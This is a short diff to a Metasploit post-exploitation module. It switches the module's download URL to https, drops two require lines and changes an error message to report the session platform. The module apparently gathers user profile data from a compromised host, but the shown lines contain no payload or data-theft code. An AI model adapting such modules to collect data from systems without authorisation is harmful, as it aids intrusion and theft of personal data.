@@ -1,12 +1,10 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
 require 'sqlite3'
 require 'uri'
-require 'rex'
 
 class MetasploitModule < Msf::Post
   include Msf::Post::File
@@ -196,7 +194,7 @@ class MetasploitModule < Msf::Post
     when /windows/
       user_profiles |= grab_user_profiles
     else
-      print_error "OS not recognized: #{os}"
+      print_error "OS not recognized: #{session.platform}"
     end
     user_profiles
   end
